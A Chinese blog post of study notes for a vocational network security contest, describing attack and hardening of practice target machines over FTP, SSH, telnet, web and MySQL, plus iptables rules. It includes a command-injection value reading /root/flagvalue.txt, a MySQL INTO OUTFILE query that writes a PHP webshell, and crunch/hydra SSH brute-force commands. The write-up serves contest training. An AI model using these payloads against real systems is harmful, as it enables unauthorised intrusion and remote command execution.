网络安全————靶机攻防加固

已于 2024-09-06 19:32:08 修改
阅读量3.5k 收藏 51
点赞数 8
分类专栏: 旺仔_学习笔记 文章标签: 安全 web安全 中职网络安全技能大赛
于 2022-06-18 16:02:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/125348053
版权
  1. 信息收集,使用kali,扫描己方靶机端口

  1. 21端口的ftp的攻击

ftp攻击方式,查看本机有哪些普通用户

admin/123456和guest/123456

然后提交flag

  1. 22端口的ssh攻击

 

使用session –I 查看已经获取到的连接

使用session –I 序号 获取连接

  1. 23 telnet的攻击方式

  1. 防御21-23端口的攻击
  1. 改密码

  1. 或者删除500以上的用户

.

  1. 80http的攻击方法

进入自己的网站根目录

DisplayDirectory.php

此页面用来查看文件夹内的内容

使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分

加固

FileSharing.php  文件上传漏洞

Kali生成木马

找到存储木马的路径

木马路径

使用工具连接

加固

WebShell.php

加固

通过查看TestConn.php页面可获知数据库密码为root/root

  1. 3306数据库攻击方式,使用kali远程连接别人的数据库

攻击代码

select '<?php system($_GET[\'a\']); ?>' INTO OUTFILE '/var/www/html/a.php';

攻击

加固漏洞

>use mysql;

>update user set Password=password('123456') where User='root';

修改密码即可

  1. 攻击10000以后的大端口后门

加固

centosiptables,关闭防火墙

清除防火墙预设规则

设置默认规则,拒绝所有进来的流量

设置默认规则,拒绝所有转发流量

设置默认规则,允许所有出去的流量

允许21,22,23,80,3306

保存防火墙规则

启动防火墙

查看结果

攻防对抗2

  1. 扫描

  1. 制作字典跑密码

crunch 6 6 -t 0000%%  > /passw

开始破解自己的密码

hydra -l root -P /passw -t 4 ssh://172.16.120.250

现在使用putty进去到自己的靶机

  1. 21-23端口攻击方法一致
  2. 80端口攻击

生成字典

调出网站后台破解工具

得出网站后台

  1. 3306与上文一致
  2. 大端口修改

攻击方法一致

加固方法需要谨慎

法1:shell脚本一次成型

法2:把防火墙规则写在防火墙配置文件里面

旺仔Sec
关注
专栏目录
2019年全国职业院校技能大赛中职组“网络空间安全”正式赛卷 ——(flag答案)
Jay
12-23 812
2019年全国职业院校技能大赛中职组 “网络空间安全”正式赛卷 任务1. Wireshark数据包分析(100分) 1.使用Wireshark查看并分析PYsystem20191桌面下的capture4.pcap数据包文件,找出黑客获取到的可成功登录目标服务器FTP的账号密码,并将黑客获取到的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;(9分) 答案:admin,admin654321 2.继续分析数据包capture4.pcap,找出黑客使用获取到的账
网络安全竞赛CTF夺旗-攻击——windows靶机漏洞攻防讲解
旺仔Sec&blog
05-25 1107
一、项目和任务描述: 假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。 请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。 二、操作系统环境说明: 客户机操作系统:Windows 10/Windows7 靶机服务器操作系统:Linux/Windows 三、漏洞情况说明: 1.服务器中的漏洞可能是常规漏洞也可能
网络安全-靶机环境搭建
Chaoer
06-21 806
靶机环境搭建1.1.1 LAMP介绍LAMP是Linux下Apache、MySQL和PHP的应用环境。Linux + Apache + MySQL + PHP平台:Apache Http Server:web服务器软件MySQL:关系型数据库管理系统PHP:通用开源脚本语言1.1.2 LAMP安装配置安装 Apache 服务:sudo yum install httpd -y开启 Apache 服务:sudo systemctl start httpd。服务开启后用浏览器访问 localhost,如果能看到
2024年11大必练网络攻防靶场!
最新发布
weixin_51725318的博客
09-10 1992
2024年11大必练网络攻防靶场!
网络空间安全——攻防对抗 2.0
Jay
05-19 1万+
网络空间安全——攻防对抗 2 信息收集,使用kali,扫描己方靶机端口 21端口的ftp的攻击 ftp攻击方式,查看本机有哪些普通用户 admin/123456和guest/123456 然后提交flag 22端口的ssh攻击 使用session –I查看已经获取到的连接 使用session –I序号 获取连接 23 telnet的攻击方式 防御21-2...
web 攻击靶机
dinghongzui6895的博客
04-22 556
一、sql注入靶机攻击 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24 发现可疑ip地址192.168.2.129 并使用nmap扫描这个ip地址,发现其开放了ftp和http协议 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sq...
中职网安 第二阶段加固靶机 笔记
Jay
10-24 2102
五、加固靶机 1.SQL加固:if(is_numeric( $id )) 判断接收值是数字才允许执行SQL语句 2.XSS加固:$name = htmlspecialchars( $_GET[ 'name' ] ); 把接收值转化为html实体,即把不解析html标签。 $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );把script标签过滤成空 $name ...
靶机Hacknos-1
weixin_50815573的博客
02-21 1690
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
网络安全——攻防阶段之加固
Jay
04-22 1228
删除关机命令 rm -rf /sbin/shutdown rm -rf /sbin/init rm -rf /sbin/reboot 查看有哪些用户 cat /etc/passwd 删除用户 禁用用户 passwd -l username # 禁用用户 userdel usernmae # 删除用户 ​ # 也可编辑/etc/passwd 文件,在不要的用户前加注释 iptables防火墙 # 先看要求开放的端口,如:21,22,23,80,3306 # 因为
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9183
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
[网络安全自学篇] 九十一.阿里云搭建LNMP环境及实现PHP自定义网站IP访问 (1)
杨秀璋的专栏
07-25 6402
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。本文主要分享作阿里云搭建LNMP环境及实现PHP自定义网站IP访问,同时详细介绍走过的坑,还发了朋友圈求助大家,再次感谢。本来想重新设置一个专栏分享基于阿里云的PHP网站搭建,但考虑到搞安全的也会面临各种靶场及个人网站搭建的情况,所以将这篇文章放置在“网络安全自学篇”中,后续还会分享PHP如何记录后台IP及Python定位经纬度等知识,希望对您有所帮助~
网络攻防靶机-设计概要 V5.docx
09-06
网络安全攻防靶机、设计概要
网络攻防实战研究 漏洞利用与提权读书笔记二
一枚努力的蛋蛋
08-24 3303
网络攻防实战研究 漏洞利用与提权读书笔记二第2章 Windows漏洞利用与提权2.1 Windows提权基础2.1.1 Windows提权信息的收集2.1.2 Windows提权准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施提权2.1.5 停用安全狗2.2 提权辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
【网络攻防】常见的网络攻防技术——黑客攻防(通俗易懂版)
m0_67393827的博客
07-29 3344
在世界人口近80亿的地球上,每天尚且发生数以百万计的抢劫打架斗殴事件,网络更是如此,网络攻防战几乎每时每刻都在发生。如果说打架斗殴枪击事件离我们还很远,那网络攻防战在你打开手机的时候就开始了!博主能力有限,暂不谈网络攻防具体操作实现过程,我们用通俗易懂的语言一块聊聊——神秘的“网络攻防”每当听到“网络攻防”这个名词,有没有一瞬间觉得很神秘?脑海中是否下意识的出现身穿黑色连衣帽的黑客中黑入某机构网站的场景?其实它并没有想象中的那么神秘,接下来我们一块唠唠常见的几种常见的网络攻防技术https。...
网络安全实战:记一次比较完整的靶机渗透
热门推荐
Android_wxf的博客
10-21 1万+
因为这么多域名我们不可能挨个去手动访问,所以我们这里用工具来批量测试,在使用工具之前,我们需要首先把所有的域名放到一个文件里面,我这里放在了name文件里,然后我们通过如下简单的shell脚本,把这些域名处理成工具可以识别的url链接并写入到名为url的文件中,便于我们下一步的利用。通过上图我们发现,服务器竟然支持了我们的axfr请求,返回给了我们请求域中所有的dns记录,既然我们拿到了当前域中所有的子域名,那么我们就可以把这些子域名都加到kali的hosts文件中。
攻防2.靶机安装
huiguo_的博客
08-23 373
文章目录一、[靶机安装](https://sourceforge.net/projects/owaspbwa/files/)二.加压压缩包,VMware打开三、[详细看笔者kali安装](https://blog.csdn.net/huiguo_/article/details/119871677) 一、靶机安装 二.加压压缩包,VMware打开 三、详细看笔者kali安装 ...
网络安全最全DC系列靶机1通关教程_dc1 靶机,2024年来看看网络安全的发展
2401_84253089的博客
05-14 1070
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
数据安全靶机
k0sec的安全路
07-03 552
1’ order by 1# 1’ order by 2# 1’ order by 3# //报错,所以order by猜解得到的列数为2,判断字段数为2 判断回显点,有两个回显点 1’ union select 1,2# 查询当前数据库版本,查询当前数据库名 1’ union select version(),database()# 查询当前数据库 表名 1’ union select 1,ta...
CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
abg49988的博客
10-11 659
本文首发安全客,未经允许禁止转载。原文链接 一. 前言   随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”,无论什么形式,这些都需要我们对于服务器的防护工作有所了解。对于线下赛,笔者虽说没有什么很高超的攻防技巧,但也是有着一些自己的心得。本文总结了一些CTF线下赛中常用的...
修改靶机攻击机的IP地址
06-27
网络安全的渗透测试或红蓝对抗中,修改靶机(target machine)和攻击机(attacker machine)的IP地址是一个常见的技术步骤。这个过程通常用于模拟真实的攻击场景,或者为了提高测试的隐蔽性和有效性。以下是关于如何进行这项操作的一些基本步骤: 1. **获取IP信息**:首先,你需要知道双方的当前IP地址,这通常可以通过命令行工具如`ifconfig`、`ipconfig`(Windows)或`nslookup`来获取。 2. **配置网络接口**:在攻击机上,可能需要调整网络接口的配置,比如使用`route`或`ip route`来添加或删除静态路由,或者使用`iptables`或`firewall-cmd`来改变转发规则,使流量指向目标IP。 3. **伪装IP**:可以使用IP欺骗技术,如Linux中的` ettercap`或`Nmap`的`--spoof-source`选项,以及Windows上的`NirSoft`工具等,来改变攻击机的源IP。 4. **靶机配置**:对于靶机,如果你希望限制或监控来自特定IP的访问,可能需要在其防火墙或安全设置中添加或修改规则,使其只接受特定的IP。 5. **验证连接**:修改后,需要验证攻击机是否能成功地与靶机建立连接,或者观察靶机的日志以确认IP地址的变化。 **相关问题--:** 1. 在渗透测试中,为什么要修改IP地址? 2. 如何防止IP欺骗被检测到? 3. IP伪装技术对网络安全有何影响?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值